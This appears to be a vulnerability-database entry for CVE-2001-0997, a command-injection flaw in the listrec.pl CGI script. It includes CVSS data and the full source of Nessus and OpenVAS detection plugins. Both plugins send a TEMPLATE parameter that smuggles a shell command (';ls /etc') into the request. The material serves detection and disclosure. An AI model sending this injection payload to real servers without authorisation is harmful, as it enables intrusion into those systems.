Search...

CVE-2001-0997

2001-09-11T04:00:00

ID CVE-2001-0997
Type cve
Reporter cve@mitre.org
Modified 2017-12-19T02:29:00

Description

Textor Webmasters Ltd listrec.pl CGI program allows remote attackers to execute arbitrary commands via shell metacharacters in the TEMPLATE parameter.

JSON Vulners Source

Initial Source

{"id": "CVE-2001-0997", "bulletinFamily": "NVD", "title": "CVE-2001-0997", "description": "Textor Webmasters Ltd listrec.pl CGI program allows remote attackers to execute arbitrary commands via shell metacharacters in the TEMPLATE parameter.", "published": "2001-09-11T04:00:00", "modified": "2017-12-19T02:29:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0997", "reporter": "cve@mitre.org", "references": ["http://archives.neohapsis.com/archives/bugtraq/2001-09/0096.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/7117"], "cvelist": ["CVE-2001-0997"], "type": "cve", "lastseen": "2019-05-29T18:07:38", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "541f07c430c989a0dc8139815db6786c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d6673794c5e02ed1d9fcda88830dc4a2"}, {"key": "cpe23", "hash": "c8da5986296b75638528fc6a0ed79ea2"}, {"key": "cvelist", "hash": "2c6c4a69b363a6e6e952f8e649776836"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "27c7580c75f8189a2ddd31c96c2f7e2b"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "17705ebf6089b97c588846c8c2064b71"}, {"key": "href", "hash": "43f89f32dbfb77ffd794e1b1b3958400"}, {"key": "modified", "hash": "5735d9c13cfbd331fe56a3c91e78e26d"}, {"key": "published", "hash": "104188eca5b21e76316544c44caf3b3d"}, {"key": "references", "hash": "8bb7c2b77ba8e0630bd327346b5f4f81"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "4a7f4f31889c1dc32fbd9ec7dc830c77"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "3da9da19681c223e0bf9905bb5641d289a32c7eff8feabf08e0a865ff61f0b4e", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:640"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231010769"]}, {"type": "nessus", "idList": ["LISTREC.NASL"]}], "modified": "2019-05-29T18:07:38"}, "score": {"value": 8.2, "vector": "NONE", "modified": "2019-05-29T18:07:38"}, "vulnersScore": 8.2}, "objectVersion": "1.3", "cpe": ["cpe:/a:textor_webmasters_ltd.:listrec.pl:1.0"], "affectedSoftware": [{"name": "textor_webmasters_ltd. listrec.pl", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:textor_webmasters_ltd.:listrec.pl:1.0:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}

{"osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSnort Signature ID: 1470\nSecurity Tracker: 1002404\n[Nessus Plugin ID:10769](https://vulners.com/search?query=pluginID:10769)\nISS X-Force ID: 7117\n[CVE-2001-0997](https://vulners.com/cve/CVE-2001-0997)\n", "modified": "2001-09-11T00:00:00", "published": "2001-09-11T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:640", "id": "OSVDB:640", "title": "Textor Webmasters Ltd listrec.pl TEMPLATE Variable Arbitrary Command Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:07:42", "bulletinFamily": "scanner", "description": "The 'listrec.pl' cgi is installed. This CGI has a security flaw that lets an attacker execute arbitrary commands on the remote server, usually with the privileges of the web server.", "modified": "2018-06-13T00:00:00", "id": "LISTREC.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=10769", "published": "2001-09-26T00:00:00", "title": "Textor Webmasters Ltd listrec.pl TEMPLATE Parameter Arbitrary Command Execution", "type": "nessus", "sourceData": "#\n# This script written by Matt Moore <matt@westpoint.ltd.uk> \n#\n# See the Nessus Scripts License for details\n#\n\n# Changes by Tenable:\n# - Revised plugin title (12/30/10)\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(10769);\n script_version (\"1.25\");\n script_cvs_date(\"Date: 2018/06/13 18:56:27\");\n\n script_cve_id(\"CVE-2001-0997\");\n \n script_name(english:\"Textor Webmasters Ltd listrec.pl TEMPLATE Parameter Arbitrary Command Execution\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitray commands may be run on the remote host.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The 'listrec.pl' cgi is installed. This CGI has a security flaw that \nlets an attacker execute arbitrary commands on the remote server, \nusually with the privileges of the web server.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Remove it from /cgi-bin/common/.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.textor.com/index.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/alerts/2001/Sep/1002404.html\" );\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2001/09/26\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2001/09/11\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n summary[\"english\"] = \"Checks for the listrec.pl CGI\";\n \n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2001-2018 Matt Moore \");\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"http_version.nasl\", \"find_service1.nasl\", \"no404.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\n\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\n\nif(!get_port_state(port))exit(0);\n\n\ndir[0] = \"/cgi-bin/common\";\ndir[1] = \"/cgi-local\";\ndir[2] = \"/cgi_bin\";\ndir[3] = \"\";\n\n for(i=0; dir[i]; i = i + 1)\n {\n item = string(dir[i], \"/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|\");\n req = http_get(item:item, port:port);\n res = http_keepalive_send_recv(port:port, data:req);\n if( res == NULL ) exit(0);\n if(\"resolv.conf\" >< res) {\n \t security_hole(port);\n\t exit(0);\n\t} \n }\n \n\nforeach dir (cgi_dirs())\n{\n item = string(dir, \"/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|\");\n req = http_get(item:item, port:port);\n res = http_keepalive_send_recv(port:port, data:req);\n if( res == NULL ) exit(0);\n if(\"resolv.conf\" >< res)security_hole(port);\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-05-29T18:31:57", "bulletinFamily": "scanner", "description": "The ", "modified": "2019-04-11T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231010769", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010769", "title": "Checks for listrec.pl", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: listrec.nasl 6056 2017-05-02 09:02:50Z teissa $\n#\n# Checks for listrec.pl\n#\n# Authors:\n# Matt Moore <matt@westpoint.ltd.uk>\n#\n# Copyright:\n# Copyright (C) 2001 Matt Moore\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10769\");\n script_version(\"2019-04-11T14:06:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-11 14:06:24 +0000 (Thu, 11 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2001-0997\");\n script_name(\"Checks for listrec.pl\");\n script_category(ACT_ATTACK);\n script_copyright(\"This script is Copyright (C) 2001 Matt Moore\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"solution\", value:\"Remove it from /cgi-bin/common/.\");\n\n script_tag(name:\"summary\", value:\"The 'listrec.pl' cgi is installed. This CGI has\n a security flaw that lets an attacker execute arbitrary commands on the remote server,\n usually with the privileges of the web server.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port( default:80 );\n\nforeach dir( make_list_unique( \"/\", \"/cgi-bin/common\", \"/cgi-local\", \"/cgi_bin\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" )\n dir = \"\";\n\n url = string( dir, \"/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|\" );\n\n if( http_vuln_check( port:port, url:url, pattern:\"resolv\\.conf\" ) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}